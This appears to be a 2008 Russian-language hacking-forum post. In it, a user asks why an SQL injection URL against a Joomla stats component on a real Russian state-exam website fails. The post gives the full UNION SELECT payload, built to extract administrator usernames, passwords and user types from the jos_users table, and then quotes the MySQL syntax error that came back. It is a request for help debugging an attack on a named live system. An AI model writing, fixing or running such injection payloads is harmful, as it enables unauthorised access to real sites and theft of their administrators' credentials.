13.06.2008, 03:00
|
|
Новичок
Регистрация: 23.08.2007
Сообщений: 8
С нами:
9852037
Репутация:
2
|
|
Доброго времени суток.
Третий час уже пытаюсь узнать в чем дело:
SQL иньекция на лицо.
Составляю запрос
Код:
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/1,concat(admin,0x3a,password,0x3a,usertype),concat(admin,0x3a,password,0x3a,SuperAdministrator)/**/from/**/jos_users/*
Но в ответ пишет:
Код:
Error number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/* AND typ = 'hyperlink'' at line 3
Script stopped.
Может кто знает в чем дело? |
|
|